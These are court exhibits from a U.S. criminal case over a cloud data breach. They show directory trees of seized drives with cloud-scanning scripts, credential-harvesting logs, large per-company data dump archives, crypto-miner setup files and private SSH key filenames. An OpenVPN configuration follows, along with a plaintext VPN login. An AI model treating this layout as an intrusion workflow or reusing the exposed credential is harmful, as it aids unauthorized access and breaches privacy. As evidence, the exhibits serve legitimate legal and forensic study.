# Directory Tree

```
/home/erratic/aws_hacking_shit
├── [      183402 Mar 18  2016]  1.19.04_StorCLI.txt
├── [       48298 Jan 19  2014]  8.07.14_MegaCLI.txt
├── [         406 Mar  9  2019]  9-3-19.non443.log
├── [         148 Jun 17  2019]  AWSSCAN
│   ├── [         108 Apr 12  2019]  C-Thread-Pool
│   ├── [         284 May 26  2019]  dump_cred.sh
│   ├── [      183664 Jun  8  2019]  main
│   ├── [       10574 Jun  8  2019]  main.c
│   ├── [        7814 Jun  8  2019]  main.h
│   ├── [     7432598 May 11  2019]  new
│   ├── [         149 Jun  8  2019]  run.sh
│   ├── [   173106176 Jun 17  2019]  s.tar.xz
│   └── [         281 May 26  2019]  test_list_key.sh
├── [         260 Jul  3  2019]  AWSScanner
│   ├── [          26 Apr  6  2019]  .vscode
│   ├── [         108 Apr 12  2019]  C-Thread-Pool
│   ├── [      378880 Apr 14  2019]  C-Thread-Pool.tar
│   ├── [          70 Apr 12  2019]  backburner
│   ├── [          26 May 29  2019]  deploy
│   ├── [      115104 Apr 18  2019]  iam01
│   ├── [      192256 Jul  3  2019]  main
│   ├── [        7181 Jul  3  2019]  main.c
│   ├── [        2360 Jul  2  2019]  main.h
│   ├── [       47794 May 29  2019]  new
│   ├── [   147607992 Apr 11  2019]  new_all.xz
│   ├── [   296355840 Apr 17  2019]  s.tar
│   ├── [   310972541 Jul  4  2019]  scan.log
│   ├── [      173915 Apr 18  2019]  user-data01
│   ├── [      182271 Apr 18  2019]  user-data02
│   └── [           0 Apr 17  2019]  whoa.txt
├── [   148285440 Apr 12  2019]  AWSScanner.tar
├── [         142 Jun  8  2019]  AZURESCAN
│   ├── [         108 Apr 12  2019]  C-Thread-Pool
│   ├── [      183976 Jun  8  2019]  main
│   ├── [       10824 Jun  8  2019]  main.c
│   ├── [        3139 Jun  8  2019]  main.h
│   ├── [       94775 Jun 10  2019]  messages.log
│   ├── [      163840 May 13  2019]  metadata.db
│   ├── [     2599310 May 11  2019]  new
│   ├── [    20342811 Jun 10  2019]  new.joblog
│   └── [         149 Jun  8  2019]  run.sh
├── [       99567 Mar 10  2019]  PublicIPs_20190305.xml
├── [      289618 Jun 15  2019]  acc.log
├── [      377601 Jun 15  2019]  acc2.log
├── [    40796160 Jun 19  2019]  all_addresses.txt
├── [      183393 Jun 19  2019]  aws.commands
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 602
Admitted_____

```
├── [      61440 Jun 19  2019]  aws.tar
├── [       2722 May 29  2019]  aws_scan
│   ├── [       3950 Apr 12  2019]  -o
│   ├── [       6165 Apr  7  2019]  07.04.19
│   ├── [          0 Apr  7  2019]  07.04.19-2
│   ├── [      16916 Mar 11  2019]  11-3-19
│   ├── [     286542 Mar 11  2019]  11-3-19.443.log
│   ├── [      44137 Mar 12  2019]  11-3-19.non443.log
│   ├── [      12298 Mar 14  2019]  14-03-19.non443.log
│   ├── [       4207 Mar 14  2019]  14-03.19
│   ├── [        399 Mar 22  2019]  22.03.19
│   ├── [       1528 Mar 23  2019]  23-03-19.ami-id
│   ├── [       1326 Mar 26  2019]  26.03.19
│   ├── [       1551 Mar 27  2019]  27.03.19
│   ├── [       2541 Mar 28  2019]  28.03.19
│   ├── [       2259 Mar 20  2019]  3-20-19
│   ├── [       2259 Mar 20  2019]  3-20-19.ssl
│   ├── [       2767 Mar 30  2019]  30.03.19
│   ├── [       1593 Mar 12  2019]  54.164.114.241.binary.user-data
│   ├── [       8968 Mar  7  2019]  7-03-19
│   ├── [      85545 Mar  7  2019]  7-03-19.443.log
│   ├── [      20784 Mar  7  2019]  7-03-19.non443.log
│   ├── [     274501 Mar  9  2019]  9-03-19.443.log
│   ├── [      12370 Mar  9  2019]  9-3-19
│   ├── [      29541 Mar  9  2019]  9-3-19.non443.log
│   ├── [        853 Mar 22  2019]  DevGatewayInstanceRole-3
│   ├── [        326 Mar 22  2019]  README
│   ├── [   10106461 Mar 14  2019]  ajaykanthei
│   ├── [      11132 May 29  2019]  all
│   ├── [  154994412 Mar  3  2019]  all_shuf.xz
│   ├── [     102400 Mar  4  2019]  ami-id.tar
│   ├── [       3891 Mar  4  2019]  another_ec2_instance_role
│   ├── [          0 Apr  4  2019]  apperian
│   ├── [       2194 Apr  2  2019]  aquire_aws_info.sh
│   ├── [      77069 Mar  8  2019]  astem-role
│   ├── [        554 Mar  8  2019]  astem.newuser
│   ├── [       1876 Mar  8  2019]  astem.role.sshkey
│   ├── [         34 Apr  6  2019]  awsscanner
│   ├── [          0 Apr  3  2019]  awstmp
│   ├── [      75911 Mar 28  2019]  capitol_one_inclusion_list
│   ├── [         27 Mar 12  2019]  cicd-instance.us-east-1.ec2.instances
│   ├── [         27 Mar 12  2019]  cicd-instance.us-east-2.ec2.instances
│   ├── [         27 Mar 12  2019]  cicd-instance.us-west-1.ec2.instances
│   ├── [     565185 Mar 12  2019]  cicd-instance.us-west-2.ec2.instances
│   ├── [         56 Apr  2  2019]  collected
│   ├── [    1551837 Mar  8  2019]  convox-us-east-1.ec2
│   ├── [       3650 Mar 14  2019]  csp.redirect.server.ec2.tags
│   ├── [      12518 Mar 14  2019]  csp.redirect.server.ec2.user-data
│   ├── [       6436 Oct  4  2018]  deploy.sh
│   ├── [       1405 Mar 14  2019]  docker.sh
│   ├── [       2088 Mar  3  2019]  ec2-full-stuff
```

```
├── [       438 Mar  7  2019]  ec2_run_instance.sh
├── [  11137024 Mar 14  2019]  events.pcap
├── [        32 Mar 22  2019]  fuckyoutoo
├── [   1044597 Mar  5  2019]  fuseos-dev-compute.ec2_instances.us-east-1
├── [       940 Apr  2  2019]  gay
├── [      1201 Mar 14  2019]  globalgarner.in.env
├── [       175 Mar 20  2019]  grep-metadata-ssl.sh
├── [       170 Mar 20  2019]  grep-metadata.sh
├── [         9 Mar  4  2019]  https_ports.txt
├── [       631 Mar 28  2019]  id
├── [      2945 Mar 14  2019]  infobloxcto.docker.repos
├── [      4467 Mar 14  2019]  infobloxctodockerstuff.sh
├── [    202036 Mar  1  2019]  ip-ranges.json
├── [         0 Apr  5  2019]  k8s
├── [        26 Apr  5  2019]  kube
├── [       268 Apr  6  2019]  limits.conf
├── [        32 Mar 15  2019]  lost+found
├── [     47721 Apr  2  2019]  mega_metadata.txt
├── [  12280552 May 29  2019]  metadata
├── [        30 Mar 22  2019]  metadata-remote
├── [1155371412 Mar 14  2019]  metadata.scanner.joblog
├── [  98330694 May 29  2019]  metadata_old
├── [  31724524 May 29  2019]  metadata_old2
├── [  18513576 May 29  2019]  metadata_old4
├── [   9375746 May 29  2019]  metadata_old_3
├── [     30381 Mar 19  2019]  metadata_to_date_03_19_19
├── [       380 Jun 25  2019]  miner
├── [  14049280 Apr  4  2019]  miner.tar
├── [         0 Apr  8  2019]  nano
├── [    117337 Mar  4  2019]  new-ec2-credentials-describe-instances
├── [ 147607992 Mar 19  2019]  new_all.xz
├── [  29425664 Apr  6  2019]  new_all2.xz
├── [        17 Mar 14  2019]  pass
├── [        96 Mar  4  2019]  ports.txt
├── [       416 Apr  6  2019]  prescan.sh
├── [       293 Apr  3  2019]  run.sh
├── [      2558 Apr 19  2019]  s3
├── [        39 Apr 13  2019]  scan.log4
├── [ 147619840 Mar 20  2019]  scan.tar
├── [       377 Apr 11  2019]  scan_for_metadata.sh
├── [      2940 Apr  6  2019]  scan_for_metadata.sh.bak
├── [1967783936 Mar 28  2019]  scanqueue.xz
├── [       184 Apr  3  2019]  spool.sh
├── [       183 Apr 19  2019]  spools3.sh
├── [       158 Apr 11  2019]  success.log
├── [      2212 Apr 12  2019]  test.c
├── [       394 Apr 12  2019]  test.sh
├── [   1213430 Mar  7  2019]  tmp
├── [    525060 Mar  7  2019]  tmp2
├── [   1208570 Mar  8  2019]  tmp3
├── [         0 Mar 28  2019]  xz
```

602-003

```
├── [      27334 Apr 18   2019]   awsscan.txt
├── [    2518916 Apr 19   2019]   az_all.txt
├── [        236 May 29   2019]   azure_scan
│   ├── [      99567 Mar 11   2019]   PublicIPs_20190305.xml
│   ├── [      82816 Mar 12   2019]   all
│   ├── [          9 Mar 12   2019]   https_ports.txt
│   ├── [    6395812 May 29   2019]   metadata
│   ├── [  115966716 Mar 14   2019]   metadata.scanner.joblog
│   ├── [   50872928 Mar 12   2019]   new_all.xz
│   ├── [         96 Mar 12   2019]   ports.txt
│   ├── [        426 Apr 11   2019]   scan_for_metadata.sh
│   └── [        184 Mar 12   2019]   spool.sh
├── [         84 Apr 25   2019]   batt.log
├── [        886 Apr  7   2019]   beanstalks.txt
├── [       1336 Mar 12   2019]   cicd-instance
│   ├── [         72 Mar 12   2019]   baseimagegold
│   ├── [         88 May 29   2019]   ccfresearch-pcaps
│   ├── [        162 Mar 12   2019]   cf-templates-197cv9t28p32b-us-west-2
│   ├── [        280 Mar 12   2019]   cfmc-dv-test
│   ├── [         22 Mar 12   2019]   cfmc-john
│   ├── [         32 Mar 12   2019]   cfmc-survent-installers
│   ├── [         48 Mar 12   2019]   chef-883
│   ├── [         44 May 29   2019]   colo-imports
│   ├── [         14 Mar 12   2019]   config-bucket-cfmc
│   ├── [        340 Mar 12   2019]   dev1-docker-config
│   ├── [        144 Mar 12   2019]   devops-base-images
│   ├── [          0 Mar 12   2019]   elasticbeanstalk-us-west-1-169157730924
│   ├── [        374 Mar 12   2019]   elasticbeanstalk-us-west-2-169157730924
│   ├── [        156 May 29   2019]   eng-jimd
│   ├── [        548 May 29   2019]   expect-script
│   ├── [      60416 May 29   2019]   gobypals
│   ├── [         72 Mar 12   2019]   gold7bucket
│   ├── [         72 Mar 12   2019]   gold7new
│   ├── [        144 Mar 12   2019]   goldbucket
│   ├── [         72 Mar 12   2019]   goldcos7
│   ├── [         72 Mar 12   2019]   goldtestbucket
│   ├── [         12 Mar 12   2019]   loggly-sauron
│   ├── [         18 Mar 12   2019]   logszylun
│   ├── [          0 Mar 12   2019]   pbximport
│   ├── [         14 Mar 12   2019]   qclb-logs
│   ├── [        122 Mar 12   2019]   sip-traffic
│   ├── [         10 Mar 12   2019]   smokeping.cfmc.com
│   ├── [     378342 Mar 12   2019]   stage-ivr-logs
│   ├── [         48 Mar 12   2019]   starbucks.cfmc.com
│   ├── [         18 Mar 12   2019]   survox-customers
│   ├── [        178 Mar 12   2019]   survox-dennis-test
│   ├── [       1240 Mar 12   2019]   survox-deploy-scripts
│   ├── [          0 Mar 12   2019]   survox-glacier
│   ├── [         88 Mar 12   2019]   survox-prod-releases
│   ├── [        164 May 29   2019]   survox-pub
│   ├── [        116 Mar 12   2019]   survox-ssl-certs
```

```
├── [          0 Mar 12  2019]  survoxbackup
├── [        998 May 29  2019]  survoxdevopsbilling
├── [         16 Mar 12  2019]  survoxdevopsbilling2
├── [         40 Mar 12  2019]  survoxmaintenance
├── [         26 Mar 12  2019]  test8812.survoxinc.com
├── [          0 Mar 12  2019]  twilio-cfmc-com-logs
├── [       5857 Apr 19  2019]  create_key.log
├── [      75518 Apr 19  2019]  create_key.log2
├── [      94869 Apr 19  2019]  create_key.log3
├── [      65655 Jun 23  2019]  drive.log
├── [   37693041 Jun 24  2019]  ec2.log
├── [      39824 Apr 19  2019]  ec2scan.txt
├── [       5298 Jun 19  2019]  headers.txt
├── [    2146938 Apr 19  2019]  hostnames.txt
├── [       3374 Jun 21  2019]  iam.log
├── [     583362 Apr 19  2019]  iam_fulllog.txt
├── [     186470 Apr 19  2019]  iam_list_users_all.txt
├── [    3078600 Apr 19  2019]  instancetype.txt
├── [    3469951 Apr 19  2019]  ldap_amazon.txt
├── [          0 Apr 19  2019]  list_key.log
├── [      77750 Apr 19  2019]  list_key.log2
├── [    1378651 Apr 19  2019]  listbuckets.log
├── [    2945389 Apr 19  2019]  local-ipv4.txt
├── [     128095 Jun 24  2019]  matches.uniq.txt
├── [    5532144 Jun 24  2019]  messages.log
├── [    2065101 Jun  1  2019]  metadataproxy.txt
├── [        312 Jun 15  2019]  miner
│   ├── [        535 Mar 12  2019]  Dockerfile
│   ├── [        130 Mar 22  2019]  ewbf-miner-docker
│   ├── [      14324 Mar 12  2019]  minersetup_eth.sh
│   ├── [         88 Mar  8  2019]  nv-docker-ethminer
│   ├── [   13778944 Mar  8  2019]  nvidia-diag-driver-local-repo-ubuntu1804-
410.104_1.0-1_amd64.deb
│   ├── [      12910 Mar  8  2019]  p3.8xlarge-2
│   ├── [       1454 Mar 12  2019]  start.sh
│   ├── [         20 Jun 15  2019]  tmp
│   └── [       3174 Mar 12  2019]  xmrstak
├── [     356705 May 18  2019]  proxy.txt
├── [     528426 Jun 24  2019]  proxycheck.log
├── [        274 Mar  8  2019]  readme.ec2miner
├── [     171971 Apr 15  2019]  scan.log
├── [    8687824 Jun 15  2019]  seattl2.log
├── [    2746898 Jun 15  2019]  seattle.log
├── [      29727 Jun 23  2019]  sts get-caller-identity
├── [       3792 Apr 25  2019]  temp.log
├── [        529 Apr 19  2019]  test_create_key.sh
├── [        538 Apr 19  2019]  test_list_buckets.sh
├── [        505 Apr 19  2019]  test_list_iam_users.sh
├── [        542 Apr 19  2019]  test_list_key.sh
├── [   38562916 Jun 24  2019]  user-data.log
├── [    4316550 Apr 18  2019]  user-data.txt
```

```
└── [       13360 Apr 15  2019]  whoa.txt


80 directories, 170 files
```

---

tree v1.7.0 © 1996 - 2014 by Steve Baker and Thomas Moore
HTML output hacked and copyleft © 1998 by Francesc Rocher
JSON output hacked and copyleft © 2014 by Florian Sesser
Charsets / OS/2 support © 2001 by Kyosuke Tokoro

602-006

```
AWSScanner
├── [        32 Jul  9  2019]  .kdev4
├── [        26 Apr  6  2019]  .vscode
├── [        69 Jul  8  2019]  AWSScanner.kdev4
├── [       118 Apr 17  2019]  C-Thread-Pool
├── [       258 Jul  8  2019]  Makefile
├── [        61 Jul  8  2019]  Makefile.config
├── [       385 Jul 12  2019]  awssession.sh
├── [    811262 Jul 14  2019]  confirmed.txt
├── [     20444 Jul 16  2019]  confirmed2.txt
├── [       177 Jul 12  2019]  getcredentials.sh
├── [     48930 Jul 10  2019]  ip_files
├── [       202 Jul 14  2019]  listiam.sh
├── [     84362 Jul 14  2019]  logs
├── [      8790 Jul  8  2019]  main.c
├── [      2522 Jul 10  2019]  main.h
├── [ 147607992 Apr 11  2019]  new_all.xz
├── [    337859 Jul 14  2019]  parallel.joblog
├── [       171 Jul 10  2019]  parselog.sh
├── [        83 Jul 10  2019]  scan.sh
└── [     38896 Jul 10  2019]  scanner

5 directories, 15 files
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 603
Admitted_____

# Directory Tree

```
.aws
├── [          63 Apr 10  2019]  config
├── [        1766 Jun 30  2019]  credentials
├── [          52 Apr  6  2019]  eks
│   └── [      18690 Apr  6  2019]  eks-2017-11-01.normal.json
└── [           6 Apr  6  2019]  models
    └── [         20 Apr  6  2019]  eks
        └── [         28 Apr  6  2019]  2017-11-01
            └── [      18690 Apr  6  2019]  service-2.json
```

4 directories, 4 files

tree v1.7.0 © 1996 - 2014 by Steve Baker and Thomas Moore
HTML output hacked and copyleft © 1998 by Francesc Rocher
JSON output hacked and copyleft © 2014 by Florian Sesser
Charsets / OS/2 support © 2001 by Kyosuke Tokoro

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 604
Admitted_____

# Directory Tree

```
SE-3142461-md126
├── [       1670 Jul 12  2019]  aws_dumps
│   ├── [82453177224 Jun 27  2019]  2230842799dbb78469157aae816a2ae52c7aa546cd3b6f88d75a811a0ddae8d7.tar.xz
│   ├── [      56136 Jun 26  2019]  42lines.net.tar.xz
│   ├── [        264 Jun 26  2019]  apperian2.tar.xz
│   ├── [26517663688 Jun 27  2019]  apperian.tar.xz
│   ├── [      11808 Jun 26  2019]  astem.tar.xz
│   ├── [  584517032 Jun 27  2019]  bck-globaleaks.tar.xz
│   ├── [175803158388 Jun 29  2019]  btadev.tar.xz
│   ├── [11550653088 Jun 27  2019]  camplat-ecs-instance-role.tar.xz
│   ├── [29098886032 Jun 27  2019]  cicd-instance.tar.xz
│   ├── [165689955268 Jun 28  2019]  code_deploy_role.tar.xz
│   ├── [  377259236 Jun 27  2019]  DevOpsAAS.tar.xz
│   ├── [170145857108 Jun 28  2019]  EC2_readonlys3.tar.xz
│   ├── [143501651692 Jun 28  2019]  ec2_s3_role.tar.xz
│   ├── [294401155764 Jun 29  2019]  ec2-s3-role.tar.xz
│   ├── [10514457316 Jun 27  2019]  ecs.tar.xz
│   ├── [ 2378614996 Jun 27  2019]  ford.tar.xz
│   ├── [  234641884 Jun 26  2019]  fuckup.tar.xz
│   ├── [40793592644 Jun 27  2019]  globalgarner.tar.xz
│   ├── [102199586668 Jun 28  2019]  hfarm-webserver-role.tar.xz
│   ├── [        408 Jun 26  2019]  hslonboarding-prod-backup1.tar.xz
│   ├── [ 8589934592 Jun 27  2019]  identiphy.img
│   ├── [    1375260 Jun 26  2019]  identiphy.tar.xz
│   ├── [     208268 Jun 26  2019]  infobloxcto.tar.xz
│   ├── [436231938048 Jul  3  2019]  ISRM-WAF-Role.tar.xz
│   ├── [13487239684 Jun 27  2019]  iwcodeacademy.tar.xz
│   ├── [77951944728 Jun 28  2019]  LNCSMASTER09-RootRole.tar.xz
│   ├── [19698699824 Jun 27  2019]  msu.tar.xz
│   ├── [94271506368 Jun 28  2019]  mystars.tar.xz
│   ├── [  391140616 Jun 27  2019]  ohio-crash-servers-role.tar.xz
│   ├── [  610103668 Jun 27  2019]  orangehw.tar.xz
│   ├── [    8195708 Jun 27  2019]  pbn.tar.xz
│   ├── [37565466392 Jun 27  2019]  Rotate_Access_key.tar.xz
│   ├── [  427275424 Jun 26  2019]  s3_logrotate_role.tar.xz
│   ├── [  372937780 Jun 27  2019]  safesocial.tar.xz
│   ├── [ 4758105364 Jun 27  2019]  service_devops.tar.xz
│   ├── [11613280756 Jun 27  2019]  starofservice.tar.xz
│   ├── [85401018000 Jun 27  2019]  unicredit.tar.xz
│   ├── [83639705016 Jun 27  2019]  universia.tar.xz
│   ├── [      21328 Jun 26  2019]  user-data.tar.xz
│   ├── [64662688188 Jun 28  2019]  viral.tar.xz
│   ├── [ 8334843424 Jun 27  2019]  vodaphone.tar.xz
│   ├── [28982620660 Jun 27  2019]  wakoopa.tar.xz
│   └── [126171943904 Jun 28  2019]  webrole2_s3.tar.xz
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 605
Admitted_____



```
miner
├── [       535]  Dockerfile
├── [       512]  ewbf-miner-docker
│   ├── [       512]  .git
│   ├── [       959]  Dockerfile
│   ├── [        52]  MAINTAINERS
│   ├── [      1245]  README.md
│   ├── [       942]  entrypoint.sh
│   └── [       940]  miner-template.cfg
├── [     14324]  minersetup_eth.sh
├── [       512]  nv-docker-ethminer
│   ├── [     12288]  .Dockerfile.swp
│   ├── [       462]  .travis.yml
│   ├── [       523]  Dockerfile
│   └── [       561]  start.sh
├── [  13778944]  nvidia-diag-driver-local-repo-ubuntu1804-410.104_1.0-1_amd64.deb
├── [     12910]  p3.8xlarge-2
├── [      1454]  start.sh
├── [       512]  tmp
│   └── [      3174]  Dockerfile
└── [      3174]  xmrstak
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 606
Admitted_____

```
.ssh
├── [       1671 Jun 24   2019]  34.200.220.172.id_rsa
├── [       1671 Mar 22   2019]  DevGatewayInstanceRole.id_rsa
├── [       1675 Apr 19   2019]  EC2Role.id_rsa
├── [       1675 Apr 14   2019]  Full_S3_access_from_EC2.id_rsa
├── [       1667 Jun 25   2019]  IAMRoleFullAccess.id_rsa
├── [       1671 Apr 19   2019]  LabCop.id_rsa
├── [       1675 Apr  7   2019]  NatProxy.id_rsa
├── [       1675 Apr 19   2019]  PowerRole.id_rsa
├── [       1671 Apr  5   2019]  Rotate_Access_key.id_rsa
├── [       1675 Apr 19   2019]  admin2.id_rsa
├── [       1671 Apr 19   2019]  admin3.id_rsa
├── [       1196 Jun 19   2019]  authorized_keys
├── [        395 Mar  9   2019]  authorized_keys2
├── [       1671 Mar  9   2019]  cicd-instance-eu-west-1.id_rsa
├── [       1672 Mar 12   2019]  code_deploy_role.id_rsa
├── [       1675 Mar 30   2019]  comcastgw.id_rsa
├── [      28397 Jun 25   2019]  config
├── [       1692 Mar  9   2019]  default.pem
├── [       1696 Mar  9   2019]  default_.id_rsa
├── [       1696 Mar  9   2019]  default_.pem
├── [       1675 Apr  7   2019]  devops-role-default3-us-west-2.id_rsa
├── [       1671 Jun 25   2019]  ec2Admin.id_rsa
├── [       1675 Mar 12   2019]  ec2service.id_rsa
├── [       1671 Mar  9   2019]  ec2service.us-west-2.id_rsa
├── [       1675 Apr 19   2019]  ecsinstancerole.id_rsa
├── [        134 Jul 19   2019]  environment-linux-it3b
├── [        137 Jul  4   2019]  environment-molly
├── [       1671 Mar  9   2019]  eu-north-1.id_rsa
├── [       1675 Mar  9   2019]  eu-west-2.id_rsa
├── [       3326 Mar  9   2019]  gentoo_id_rsa
├── [        739 Mar  9   2019]  gentoo_id_rsa.pub
├── [       1314 Mar  9   2019]  gentoo_id_rsa.pub.gpg
├── [       1675 Mar 14   2019]  github
├── [        395 Mar 14   2019]  github.pub
├── [       1671 Apr  9   2019]  iwcodeacademy.id_rsa
├── [       1671 Mar 12   2019]  jflores.id_rsa
├── [       1671 Mar  9   2019]  k-e8032af1a6cfd3257.id_rsa
├── [      25112 Mar  9   2019]  key.pem
├── [     234249 Jun 25   2019]  known_hosts
├── [       1675 Apr  7   2019]  laptop.id_rsa
├── [        395 Apr  7   2019]  laptop.id_rsa.pub
├── [       3326 Mar  9   2019]  mine_temp.id_rsa
├── [        739 Mar  9   2019]  mine_temp.id_rsa.pub
├── [       1675 Apr 19   2019]  miyazawa.id_rsa
├── [       1675 Jun 25   2019]  n2wadmin.id_rsa
├── [       1679 Mar  9   2019]  new_molly
├── [        395 Mar  9   2019]  new_molly.pub
├── [       3326 Mar 22   2019]  oldmolly.id_rsa
├── [       1671 Apr 15   2019]  orchard.id_rsa
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 607
Admitted_____

```
├── [     1696 Mar  9  2019]  p3.8xlarge-1
├── [     1675 Apr 19  2019]  roleec2.id_rsa
├── [     1679 Apr  3  2019]  rsouto
├── [     1675 Jun 25  2019]  saltmaster.id_rsa
├── [     1672 Apr 11  2019]  shell
├── [     1676 Apr  7  2019]  shell.ap-southeast-2.id_rsa
├── [   348160 May  8  2019]  ssh.tar
├── [     1675 Jun 25  2019]  taclauncher.id_rsa
├── [     1675 Apr  7  2019]  trenbe.id_rsa
├── [     3326 Mar  9  2019]  unknown_rsa
└── [     1671 Apr 19  2019]  weighttrainer.id_rsa

0 directories, 60 files
```



| | Name ^ | | Description | Type | | Size | Created | Modified ▼ | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 📁 | = openvpn (13) | | existing | | | 14.2 KB | 08/27/2018 07:37... | 04/15/2019 17:57... | 04/15/2019 17:57... | rwxrw... | 579,964 |
| 📁 | = client (5) | | existing, already viewed | | | 7.4 KB | 08/27/2018 07:39... | 06/10/2019 18:18... | 06/10/2019 18:18... | rwxrw... | 579,964 |
| | IPredator.conf | | existing, already viewed | txt | | 4.7 KB | 08/27/2018 07:39... | 06/10/2019 18:16... | 06/10/2019 18:16... | rwxrwxr... | 4,288,448 |
| | set_route.sh | | existing, already viewed | sh | | 250 B | 04/15/2019 15:33... | 06/03/2019 08:40... | 06/03/2019 08:40... | rwxr-xr-x | 559,092 |
| | ipredator_auth.txt | | existing, already viewed | txt | | 25 B | 08/27/2018 08:29... | 08/27/2018 08:29... | 08/27/2018 09:11... | rwxrw... | 571,058 |
| | IPredator.se.ta.key | | existing, already viewed | ascii_unix | | 0.6 KB | 08/27/2018 07:40... | 08/27/2018 07:40... | 08/27/2018 09:11... | rwxrw... | 571,025 |
| | IPredator.se.ca.crt | | existing, already viewed | crt | | 1.8 KB | 08/27/2018 07:40... | 08/27/2018 07:39... | 08/27/2018 09:11... | rwxrw... | 571,026 |

▼ Partition   📄 File   ▸ Preview   🔲 Details   🖼 Gallery   📅 Calendar   📖 Legend   ; Raw Text   ▾ 🔍 ▦ ▦ ◇▭    Selected:

```
# Note: openvpn must be started with these flags:
# /etc/default/openvpn : OPTARGS="--tls-timeout 5 --script-security 2 --management /run/IPredator.sock unix"


client                # Indicate that this is a client configuration
nobind                # Bind to the interface and client (source) port allocated by the IP stack
passtos               # Set the TOS field of the tunnel packet to what the payload's TOS is.
persist-key           # Maintain keys after SIGUSR1 or ping-restart
tls-client            # Require a TLS session
ifconfig-nowarn       # Don't fail consistency check if client options and remote (push) options are mismatched
ping-timer-rem        # Run ping-restart only if the tunnel interface has an IP address
up-restart            # Allow up script to be called upon ping-restart
ncp-disable           # Disable cipher negotiation (ciphers indicated are mandatory)
allow-recursive-routing  # Allow ingress packets with the same dst as host
mute-replay-warnings
route-noexec
remote-random
fast-io

daemon        IPredator   # Become a daemon and change process name to IPredator
dev           IPREDATOR   # Name to give the interface
dev-type      tun       # Type of interface (since not inferred by interface name)
proto         udp       # UDP Client
auth-retry    nointeract  # Do not require auth-user-pass on reconnect
tun-mtu       1500      # MTU of the tunnel interface
mssfix        1200      # segment size?
verb          4         # Logging Verbosity (higher is pointless mostly)
replay-window 512 60    # Replay protection window (size, time window) default: 64 15
user          nobody    # User to setuid as
ping          10        # ping frequency
ping-restart  20        # ping timeout
explicit-exit-notify 2  # Send exit notification on restart to server and advance to the next server, don't wait for timeout
server-poll-timeout 1   # timeout during connect if servers doesn't respond within 1 second, try the next
mute          20        # Suppress messages grouped by category
nice          -19       # Set process niceness to -19 (second highest, don't set to -20)
connect-retry  infinite  # Try to reconnect infinitely
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 621
Admitted_____

```
 1   openvpn/
 2   ├── [           164 Jun 10  2019]  client
 3   │   ├── [          4853 Jun 10  2019]  IPredator.conf
 4   │   ├── [          1846 Aug 27  2018]  IPredator.se.ca.crt
 5   │   ├── [           636 Aug 27  2018]  IPredator.se.ta.key
 6   │   ├── [            25 Aug 27  2018]  ipredator_auth.txt
 7   │   └── [           250 Jun  3  2019]  set_route.sh
 8   ├── [           222 Nov 19  2018]  server
 9   │   ├── [           524 Sep  8  2018]  pub-ext.conf
10   │   ├── [          3525 Aug 27  2018]  pub-ext.seattle1.wa.us.yourstruly.sx.p12
11   │   ├── [           190 Aug 27  2018]  pub_ext_ccd
12   │   │   ├── [           230 Aug 27  2018]  paige-laptop.pub-ext.seattle1.wa.us.yourstruly.sx
13   │   │   └── [           235 Aug 27  2018]  publikate.pub-ext.seattle1.wa.us.yourstruly.sx
14   │   ├── [           424 Aug 27  2018]  pub_ext_dh.pem
15   │   ├── [             7 Aug 27  2018]  pub_ext_p12_pass.txt
16   │   └── [           636 Aug 27  2018]  pub_ext_ta.key
17   └── [          1301 Jul 18  2017]  update-resolv-conf
18
19   3 directories, 13 files
```

```
IPredator.conf 🗙
30  replay-window          512 60          # Replay protection window (size, time window) default: 64 15
31  user                   nobody          # User to setuid as
32  ping                   10              # ping frequency
33  ping-restart           20              # ping timeout
34  explicit-exit-notify   2               # Send exit notification on restart to server and advance to the next server,
    don't wait for timeout
35  server-poll-timeout    1               # timeout during connect if servers doesn't respond within 1 second, try the
    next
36  mute                   20              # Suppress messages grouped by category
37  nice                   -19             # Set process niceness to -19 (second highest, don't set to -20)
38  connect-retry          infinite        # Try to reconnect infinitely
39  sndbuf                 0
40  rcvbuf                 0
41
42  # # # # # # # # # # # # # # # # # # #
43  #           Crypto Settings          #
44  # # # # # # # # # # # # # # # # # # #
45
46  cipher                 AES-256-CBC     # Cipher to use for data channel encryption
47  ns-cert-type           server          # Verify the nsCertType field of the remote certificate
48  remote-cert-tls        server          # Require remote certificate type be a server certificate
49  remote-cert-ku         0x00e0          # Require that peer certificate was signed with an explicit key usage.
50  tls-timeout            2               # Packet retransmit timeout on TLS control channel if no acknowledgment from
    remote within n seconds
51  tls-version-min        1.2             # min supported TLS version
52  reneg-bytes            8000000         # renegotiate session keys every n bytes
53  tran-window            3600            # allow old session key to be scavenged for up to 3600 seconds after
    renegotiation
54
55
56  # # # # # # # # # # # # # # # # # # #
57  #             Pathes                 #
58  # # # # # # # # # # # # # # # # # # #
59
60  cd                     /etc/openvpn/client # Set the working directory of OpenVPN to the configuration directory
    (change or leave)
61  ca                     IPredator.se.ca.crt  # CA certificate
62  tls-auth               IPredator.se.ta.key  # Client private key
63  auth-user-pass         ipredator_auth.txt   # password file (with the format: user:pass)
64  route-up               set_route.sh         # tunnel-is-up script to run to configure default gateway after connect
65
66  # # # # # # # # # # # # # # # # # # #
67  #            Server List             #
68  # # # # # # # # # # # # # # # # # # #
69
70  remote                 46.246.44.2      1194
71  remote                 46.246.35.2      1194
72  remote                 46.246.37.0      1194
73  remote                 46.246.43.2      1194
74  remote                 46.246.44.2      1194
75  remote                 46.246.45.2      1194
76  remote                 46.246.62.2      1194
77  remote                 46.246.34.130    1194
78  remote                 46.246.35.130    1194
79  remote                 46.246.36.130    1194
80  remote                 46.246.37.130    1194
81  remote                 46.246.39.130    1194
82  remote                 46.246.40.130    1194
83  remote                 46.246.41.130    1194
84  remote                 46.246.44.130    1194
85  remote                 46.246.45.130    1194
86  remote                 46.246.62.130    1194
```



ipredator_auth.txt

```
1    paigethylamine
2    cheese123
3
```

621-004

set_route.sh ☒

```
 1     #!/bin/bash
 2
 3    ┌#match=$(echo $4 | tr '.' ' ' | awk '{print $1"."$2"."$3}' | tr -d '\n')
